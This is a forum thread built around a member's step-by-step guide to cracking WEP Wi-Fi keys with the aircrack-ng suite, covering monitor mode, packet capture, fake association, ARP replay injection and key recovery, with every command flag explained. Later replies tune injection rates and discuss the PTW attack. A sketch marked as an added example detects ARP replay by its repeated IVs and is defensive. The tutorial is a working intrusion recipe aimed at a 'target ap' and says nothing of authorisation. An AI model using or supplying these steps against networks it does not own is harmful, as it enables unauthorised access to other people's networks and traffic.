
Thread: My wep tutorial

  1. #1
    Member
    Join Date
    Jul 2007
    Posts
    113

    Default My wep tutorial

    When I do not do things repeatedly I normally forget how to do them. So I typed up the steps I take when cracking wep.


    Wep Cracking Guide
    Before attempting to follow this tutorial please update your aircrack to the newest dev version.



    1. Put your card into monitor mode and listen on the correct channel
    airmon-ng start wlan0 6
    start This will put your card into monitor mode.
    wlan0 This is your wireless card's name.
    6 Is the channel that your target ap broadcasts.

    2. Start airodump-ng to capture packets.
    airodump-ng wlan0 -c 6 --bssid 00:11:22:33:44:55 -w output
    wlan0 Is your wireless card's name
    -c 6 Designates which channel airodump should listen for packets on. This should be the same channel as your target ap.
    --bssid 00:11:22:33:44:55 Designates the mac address of your target ap.
    -w output Is the file where all the packets will be saved and output is the name. The files will appear as output-1.cap output-2.cap etc.

    3. Associate with the target ap.
    aireplay-ng -1 60 -q 10 wlan0 -e test -a 00:11:22:33:44:44 -h 00:11:22:33:44:55 -o 1
    -1 60 Tells the card to fake associate with the target ap and reassociate every 60 seconds.
    -q 10 Tells the card to send keep-alive packets every 10 seconds.
    wlan0 Is the name of your wireless card's interface.
    -e Tells the card which ap to target, if the ap has spaces in it surround it with quotations. i.e. "test ap"
    -a Tells the card the mac address of the ap to target.
    -h Tells the card the mac address of the wireless card you are using.
    -o 1 Tells the card to send 1 packet at a time.

    4. Find your card's maximum bitrate.
    aireplay-ng -9 -B wlan0
    -9 This tests your card to see if it can inject.
    -B performs bitrate test.
    wlan0 Is your wireless card's name.

    5. Set your card's bitrate so you get the most pps (packets per second)
    iwconfig wlan0 rate 54M
    wlan0 Is your wireless card's name.
    rate 54M Sets your bitrate, 54 is the highest. You want to put the highest number that you successfully got on the bitrate test.

    6. Use ARP replay on the target ap to get ivs.
    aireplay-ng -3 wlan0 -b 00:11:22:33:44:55 -h 00:11:22:33:44:55 -x 100
    -3 Is the standard ARP replay attack.
    wlan0 Is your wireless card's name.
    -b 00:11:22:33:44:55 The mac address of your target ap.
    -h 00:11:22:33:44:55 The mac address of your wireless card.
    -x 100 The rate of packet injection. (The higher the better, but some aps will disassociate with you if it is too high)

    7. Crack the wep key of your target ap.
    aircrack-ng -b 00:11:22:33:44:55 output*.cap
    -b 00:11:22:33:44:55 Is the mac of your target ap. (aircrack-ng searches through the airodump files for packets matching this mac)
    output*.cap This is the name of the file aircrack-ng will search through for packets. (The * tells aircrack-ng to use any file with the prefix of output)


    Thanks to the aircrack-ng dev team for this great program, and darkAudax for all his wonderful entries in the aircrack-ng wiki.
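
Seen from the monitoring side, the ARP replay in step 6 stands out because one captured encrypted frame is resent unchanged at the -x rate, so the same WEP IV and frame length repeat from a single transmitter. The following is an added example, not part of the original post: a sketch of that check over constructed frame records (the tuple layout, the client MAC addresses and the thresholds are assumptions).

```python
from collections import defaultdict

AP = "00:11:22:33:44:55"  # placeholder BSSID, as used in the tutorial


def make_sample():
    """Constructed records: (time_ms, transmitter, bssid, wep_iv_hex, length)."""
    frames = []
    # Ordinary client: 20 frames/s for 2 s, a fresh IV on every frame.
    for i in range(40):
        frames.append((i * 50, "aa:bb:cc:00:00:01", AP, f"{i:06x}", 200 + i % 7))
    # Replaying station: one captured frame resent 100 times/s for 2 s,
    # so the IV and the length never change.
    for i in range(200):
        frames.append((i * 10, "aa:bb:cc:00:00:02", AP, "a1b2c3", 68))
    return sorted(frames)


def find_replay(frames, window_ms=1000, min_repeats=50):
    """Return {transmitter: (iv, peak)} for stations that send the same
    (IV, length) pair at least min_repeats times inside one sliding window."""
    seen = defaultdict(list)
    for t, tx, bssid, iv, length in frames:
        seen[(tx, bssid, iv, length)].append(t)
    alerts = {}
    for (tx, _bssid, iv, _length), times in seen.items():
        times.sort()
        lo = peak = 0
        for hi, t in enumerate(times):
            # Shrink the window from the left until it spans <= window_ms.
            while t - times[lo] > window_ms:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= min_repeats and peak > alerts.get(tx, ("", 0))[1]:
            alerts[tx] = (iv, peak)
    return alerts


if __name__ == "__main__":
    for tx, (iv, peak) in find_replay(make_sample()).items():
        print(f"{tx}: IV {iv} repeated {peak} times within one second")
```

A legitimate WEP client changes the IV between frames, so a low min_repeats threshold already separates replay from normal traffic; retransmissions of a single frame stay far below it.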

  2. #2
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    Welcome to the Forum!!
    Good start for you with the tut!
    step 6 with -x 100, i use -x 1000. my card likes the overdose of packets, once it comes down it gets in a mood.

  3. #3
    Member
    Join Date
    Jul 2007
    Posts
    113

    Default

    I normally leave it at however fast my card can get, but when the ap can't handle it and it dissociates I have to reduce the packets some. Btw, thanks for the welcome! :-)

  4. #4
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    i only associate once, it seems to do the trick. i know what ya mean about different PPS. best results for me is 1000.
    step 7, have a look for the new aircrack-ng or aircrack-ptw. you'll get the key faster with less packets.

  5. #5
    Member
    Join Date
    Jul 2007
    Posts
    113

    Default

    I have the newest version of aircrack-ng, the dev version. The ptw attack on wep is now default. I crack my weps with 10k-40k ivs. I normally get dissociated with the AP because my pps is so high so I have to make sure my card keeps trying to associate and then lower my pps so my card stays associated.

  6. #6
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Originally posted by Baxter:
    i only associate once, it seems to do the trick. i know what ya mean about different PPS. best results for me is 1000.
    step 7, have a look for the new aircrack-ng or aircrack-ptw. you'll get the key faster with less packets.
    The default for the latest dev versions is to use a ptw attack, you now use a switch to not use ptw
    Off the top of my head it's -z
    I think

  7. #7
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    i know, but i still like using ptw.

  8. #8
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    now you just use
    aircrack-ng to launch ptw attack which is now default
    aircrack-ng -K allow the old standard attack....

    the -z no longer exists in newer devs...
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  9. #9
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    5

    Default Kismet not needed for wep crack?

    Joseph,

    In your initial post (step-by-step guide) you have not used the KISMET.
    Is that not needed with your guide? or am I missing something?

    Thanks,

  10. #10
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    i never use kismet for wep cracking....
    airodump is enough...really....
